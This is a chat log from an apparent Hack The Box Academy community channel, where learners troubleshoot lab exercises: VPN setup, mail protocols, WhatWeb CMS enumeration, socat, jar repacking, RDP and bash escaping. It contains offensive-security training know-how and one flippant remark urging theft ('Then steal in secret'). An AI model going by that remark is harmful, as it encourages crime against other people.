fathom pendant
#

You can access any available mailbox

zealous rune
#

ok, but there doesn't seem to be a list or dir command

fathom pendant
#

1 select <mailbox>

zealous rune
#

that's imap commands

#

i got that to work on the imap service

fathom pendant
#

Oh

zealous rune
#

but i'm trying to retrieve the mail on pop3 service

fathom pendant
#

Pop3 doesn't have an organization structure

#

list shows the mail and ids

#

Then retr <id>

zealous rune
#

ok, the pop service reports 0 messages, so not sure it sees all folders

fathom pendant
#

Weird it should see the email

#

I take it you're logged into the pop3s yeah?

zealous rune
#

list +OK 0 messages:

#

yeah logged in and authenticated

fathom pendant
#

Sec

zealous rune
#

+OK Logged in. list +OK 0 messages:

#

the question does say specifically to read it from the imap service so getting there is a difference

fathom pendant
#

It could be that it's only available on imap

#

I might have been thinking of another module/skill assessment

#

Usually it should be available to read on both

cloud urchin
#

pop3 could be pointing to a different mail server entirely, or it may not have downloaded from the server yet

#

they are different protocols and both manage email differently

#

if you see both running on a server you should check both

fathom pendant
#

The question explicitly states reading email with IMAP

cloud urchin
#

it could also mean that the pop3 client simply hasn't downloaded the email yet

fathom pendant
#

This is a spoiler dude

#

I suggest deleting it

ocean night
#

@mild python please avoid posting content that could be considered spoilers for others. Take questions like that to DM's for those that are willing to give you advice.

shell kindle
#

I have a problem connecting to the vpn I tried all the possible commands

#

I need a help @ocean night

ocean night
shell kindle
#

I reached them but nothing

#

I tried all the possible options

ocean night
#

Then you'll just need to wait for them to respond I'm afraid

#

I'm not here as a support agent, I'm sorry

shell kindle
#

Warning : compression for receiving.......

fathom pendant
shell kindle
#

But it doesn't work at all

fathom pendant
#

At the tail end of that do you see "initialization sequence completed"?

#

Are you running it with sudo?

shell kindle
#

Yes

fathom pendant
shell kindle
#

Just to send u the pic if u have any help

fathom pendant
#

Your pic you dmed shows me it connected

shell kindle
#

Why there is no ping ??

fathom pendant
#

¯_(ツ)_/¯

dim wolf
#

spin up the target box and ping it

zealous rune
#

thanks guys

fathom pendant
#

If you do ip a do you only have one tun interface?

shell kindle
fathom pendant
#

Also different vpns for different portions of htb

#

Starting-point is different from labs is different from academy

zealous rune
#

for the academy vpn i always download the config file every time i spin up a target

#

20?

fathom pendant
#

It doesn't know how to route traffic to you bc you have 20 ovpn processes running

dim wolf
#

20 tun interfaces?

fathom pendant
#

sudo killall openvpn

#

Then run the vpn connection again

#

If you see "initialization sequence completed" then it's connected

shell kindle
#

Still 20 tun

quasi wave
#

This is for information gathering web edition module. The section is Active Infrastructure Identification.

I am trying to use WhatWeb to figure out the CMS used on app.inlanefreight.local. Its a one word answer. I thought it was Apache but its not. I know the OS used for inlanefreight.local and I know the Apache version.

How do I find the content management system?

fathom pendant
#

Restart your vm and then try again

shell kindle
fathom pendant
#

The tun ip is the ip assigned to you by the vpn

dim wolf
quasi wave
shell kindle
#

When I ping the target ip there is no result when I pinged the tun it worked

dim wolf
#

unfortunately, i don't have the notes for the module

dim wolf
#

can you browse the website?

shell kindle
#

And that's the problem

analog dock
#

Do you though

quasi wave
fathom pendant
#

ps aux | grep openvpn

dim wolf
#

you can look up the most popular CMSes and try to look for those on the site or in the html source

shell kindle
fathom pendant
ocean night
#

🤦‍♂️

fathom pendant
#

That command is to show how many openvpn processes are running

#

If there's more than 1 (excluding grep) that's a problem

shell kindle
fathom pendant
shell kindle
fathom pendant
#

It should kill all labeled openvpn but whatever works for you

shell kindle
#

Thanks again for ur help

quasi wave
#

ok I am browsing website and I tried curl -I and its not getting me anything and online resources can't identify it because its a private IP address

#

view source doesn't show me the CMS

fathom pendant
#

¯_(ツ)_/¯

ocean night
#

You need to add the hosts entries stated above the questions

#

(to the /etc/hosts file)

fathom pendant
#

Also this ^

quasi wave
#

I did curl -I

#

hold on a sec

ocean night
#

The answer is there

fathom pendant
#

Whatweb is a good tool for enumerating as well

ocean night
quasi wave
#

in fact I tried it multiple times

fathom pendant
quasi wave
#

ok I will try again

fathom pendant
#

The CMS isn't found with Curl -I

quasi wave
#

ok

fathom pendant
#

You can use curl to find it, but you'll have to grep for keywords

quasi wave
#

I'm trying to find it with WhatWeb but this command I'm trying isn't working:

whatweb http://10.129.42.195/ -v --search-plugins="Content" ```
minor saddle
#

Anybody done the zephyr Pro labs

quasi wave
#

it gets me all plugins in existence with word content in them and not the ones for that IP

minor saddle
#

Its driving me crazy how stuck I am I don't understand

fathom pendant
minor saddle
#

The thing I'm supposed to do works in other environments

fathom pendant
fringe urchin
fathom pendant
fringe urchin
#

susge faking me

#

Im on mobile tooPepeLookUp

fathom pendant
fringe urchin
#

Had to look whats the chamnel for zehpyr firstpepeSadge

fathom pendant
valid viper
#

Learn to swipe.

quasi wave
#

but I did that and I didn't see the cms

fathom pendant
fathom pendant
#

app.inlanefreight.local

valid viper
#

Yes, add that to /etc/hosts

fathom pendant
#

As this ip is hosting 2 hosts, app.inlanefreight.local and dev.inlanefreight.local

valid viper
#

Thank God the sun is out today.

quasi wave
#
┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-xwesdi4mrk]─[~]
└──╼ [★]$ whatweb -a3 http://app.inlanefreight.local -v
ERROR Opening: http://app.inlanefreight.local - no address for app.inlanefreight.local
┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-xwesdi4mrk]─[~]
└──╼ [★]$ whatweb -a3 app.inlanefreight.local -v
ERROR Opening: http://app.inlanefreight.local - no address for app.inlanefreight.local
fathom pendant
#

Each question tells you which to look at

quasi wave
#

ok but how do I set vhost

quasi wave
#

ok got it

valid viper
fathom pendant
#

ip host1 host2 host3...

sterile epoch
#

I am trying to use socat on windows I am getting this error I tried putting my firewall down but it did not help

 .\socat.exe TCP-LISTEN:8000,fork TCP:127.0.0.1:1337
2024/04/25 02:48:36 socat[16964] E connect(5, AF=2 127.0.0.1:1337, 16): Connection refused
fathom pendant
valid viper
#

But he listens to you and not me 😔

#

Oh wow...lol

fathom pendant
#

G0blin even told him lmfao

valid viper
#

Password Attacks is almost over for me.

fathom pendant
#

The hard lab was the most fun for me imo

valid viper
#

Yeah, I'm a bit intimidated by the labs but I'll make it. I just hate having to use RDP.

#

It's clunky.

fathom pendant
valid viper
#

Is there a way to convert a CMD reverse shell to Powershell?

fringe urchin
#

Im doing 1 section per day lolpepecoffee but for now didnt had any problems at password attacks(luckily i saw it many times marcie saying dont attack ssh on mitations lol) saved me a grey hair

quasi wave
#

so I have the hosts file open and I'm thinking I put it at the bottom?

fringe urchin
valid viper
#

That helps 🙂

sterile epoch
#

hello?

ocean night
#

Hello, we hear you @sterile epoch ! 😉

sterile epoch
#

attacking common applications thick clients

fathom pendant
#

Potentially 1337 is already in use

#

¯_(ツ)_/¯

sterile epoch
#

I checked in resource monitor

fringe urchin
quasi wave
#

solved it

fringe urchin
#

Not that i can think of any. FeelsBadMan

sterile epoch
valid viper
fathom pendant
#

Just type powershell and it drops you into a powershell session

fringe urchin
sterile epoch
#

I first decompiled the jar file > removed the deleted the 2 files in META-INF > removed the hashes from MANIFEST.MF > changed the port from 8000 to 1337 and then used the command jar -cmf .\META-INF\MANIFEST.MF ..\fatty_mod.jar *
I get the error htb.client.run.Starter not found

sterile epoch
valid viper
#

Damn...

#

I can't wait to get to that part.

#

Such a good value.

sterile epoch
#

I just hope they dont throw any thick applications in the exam

valid viper
#

What's your background?

sterile epoch
#

A B.tech graduate

#

no work experience

valid viper
#

I see. Yeah that's a tough segue.

#

But hey, when you're done with this cert you'll be a hacker 🙂

quasi wave
#

tbh its not even certs that would do that

sterile epoch
#

true

cloud urchin
#

you don't need any certs to be a hacker

quasi wave
#

I think to be considered an actual hacker, you need well-rounded skills not certs

valid viper
#

If I can get into a corporate network and do XYZ...

sterile epoch
#

I just hope its enough to boost my confidence

quasi wave
#

or you need very advanced skills in a few specific areas

valid viper
quasi wave
sterile epoch
#

i am trying but recession is hitting me hard

quasi wave
#

hacker is about the mentality and the skills

fringe urchin
valid viper
sterile epoch
#

at this point I just want to learn new stuff

valid viper
#

Especially when 76% of Azure AD tenants do NOT have MFA enabled.

quasi wave
valid viper
#

It doesn't take much.

quasi wave
#

ok

valid viper
#

Do I...?

#

I mean I had to manipulate people to get into the industry.

quasi wave
#

I mean I don't think its about having one cert. That's like saying anyone who can spar in boxing is "a fighter" because they have intermediate fighting skill. It doesn't really work that way.

quasi wave
#

I think to be taken seriously as a hacker you will need more than just intermediate skills

valid viper
quasi wave
#

and you need the attitude and mindset of a hacker

#

which is something you have to be born with

valid viper
#

When you have no money for food, trust me... You figure out how to get it.

quasi wave
#

ok

valid viper
#

You get very creative when you need to eat or pay your bills.

dim wolf
#

nobody is born with such an attitude or mindset

valid viper
#

I always hated authority, so that was a start.

dim wolf
#

anyone is capable of acquiring those

quasi wave
#

ok

valid viper
#

Imagine you're starving in a western nation... How do you get money to eat?

#

Yes but you don't want to go to jail so...

quasi wave
#

well, I don't want to have an argument I guess but I think we should definitely continue this conversation at some point

fringe urchin
#

Then steal in secret

sterile epoch
dim wolf
#

i think the Learning Process does an excellent job of teaching you the kind of mindset you should have

quasi wave
#

I'm gonna rest a little I'll talk to you guys later tonight

zealous rune
#

hmmm parrot doesn't have snmpwalk installed by default?

valid viper
dim wolf
#

and it demonstrates that anyone can achieve such a way of thinking

zealous rune
#

aquick search shows me
/usr/share/doc/libnet-snmp-perl/examples/snmpwalk.pl

valid viper
#

I need this cert to get on with Synack to get more moneys.

#

With Synack on my resume and a CVE, I can get back into security 🙂

#

Application Security Engineer || Beg for a pentester job...?

#

Application Security Engineer roles require the CWEE but... Much less competition.

#

As I said, necessity.

zealous rune
#

i just moved the script over to /usr/bin and did a chmod +x

valid viper
zealous rune
#

yh

valid viper
#

You catch the shell?

zealous rune
#

it's in my $PATH so

#

just setting up enviornment aint got to questions yet

inner geyser
#

Anyone dealing w/ slower than usual target VMs in the modules or is it just me?

valid viper
upbeat island
#

In the module web edition the question that said “summit the number of all “A” records from all zones as the answer” when I did and count as 19 the system say is incorrect

upbeat island
#

Sorry, I don’t get it

cloud urchin
#

you'll need to look for more

fathom pendant
upbeat island
#

Done, Thanks

valid viper
#

Target is spawning... :/

primal flint
#

Why is it so hard to keep a functioning target after 5pm EST?

rustic sage
fathom pendant
primal flint
#

For me they run for about 2 minutes and poof

sterile epoch
#

hello any help on why am I getting this error?

java -jar .\fatty-client-new.jar
Error: Could not find or load main class htb.fatty.client.run.Starter
cloud urchin
#

if you're following the section precisely, that's why. the commands they give don't really follow what's actually going on

valid viper
#

I can't connect to a target via RDP.

#
[16:24:35:074] [3423:3424] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[16:24:35:074] [3423:3424] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
#

Remmina doesn't work either.

cloud urchin
#

your error indicates NLA Is enabled

cloud urchin
#

NLA is an additional security layer for remote desktop sessions requiring the user to authenticate to the remote machine before a full Remote Desktop session is established

ocean night
#

Don't share commands that may be considered spoilers for modules over Tier 0, please.

#

At least not in public channels like this.

#

Take it to DM if you want to share info like that

sterile epoch
#

sorry my bad I asked for it looked like it was part of my path and I could help

valid viper
sterile epoch
#

it contained creds

valid viper
#

The creds are included in the lesson. And I can't even connect via pwnbox.

valid viper
sterile epoch
#

goblin can you help me with my error?

ocean night
#

I'm sorry no, I'm about to go to sleep

sterile epoch
#

ok

valid viper
#

So does anyone know when this will be fixed?

sterile epoch
#

which path is it from?

valid viper
#

Password Attacks.

sterile epoch
#

link?

valid viper
inner geyser
#

@valid viper you might try remmina instead of xfreerdp to connect. I just had to use that as I was getting the first error you were getting

valid viper
#

Also tried bare metal, VM, and pwnbox. SSDD.

#

Used nmap and port 3389 is open.

#

I guess I'll switch my region and try to refresh my VPN.

inner geyser
#

Weird...I literally just did that module and had to install/use remmina which did connect for me. what error are you getting with that?

fathom pendant
#

It's likely a timeout error or it could be a bad password

ocean night
#

I managed to connect just fine

fathom pendant
ocean night
#

Pay attention to the characters in the input, and how you might want to escape them

fathom pendant
#

$$ is a variable call that calls the PID of the shell iirc

sterile epoch
#

oh they gave the answer

ocean night
#

Wasn't me that time, but what has been said above will get you moving forward

valid viper
#

Thank you, but I don't have that in my notes...?

sterile epoch
fathom pendant
sterile epoch
#

look into the bash scripting module

fathom pendant
#

Single quotes tells bash that you are passing a literal string

sterile epoch
#

its helpful

fathom pendant
#

So it doesn't try and resolve any perceived variable calls

valid viper
#

I'm not seeing that in my notes...I know I've logged into other boxes via RDP without single quotes before.

fathom pendant
#

Because those didn't have a pw which could be interpreted in a different manner by bash

sterile epoch
valid viper
#

Again not trying to be rude, just want to understand.

ocean night
#

More advanced modules like this assume you have some prior experience with the environment you're working with (in this case bash)

fathom pendant
#

!,$,<,> are all special characters interpreted differently by bash

ocean night
#

As things lke escaping strings, variables etc all are likely covered in earlier modules

fathom pendant
#

! calls history
$ calls a variable
< and > are used to redirect input/output

#

| passes the output to another command as stdin

#

There's a handful of ways to escape

valid viper
#

So because it contains $ I need to negate its value as a var via escaping.

fathom pendant
#

Single quotes, \

fathom pendant
valid viper
#

Well yeah.

fathom pendant
#

Either way: either adding a \ before the $ or just wrapping in single quotes avoids the issue

#

Single quotes = "this text is a pure string, not a mixed string with a variable"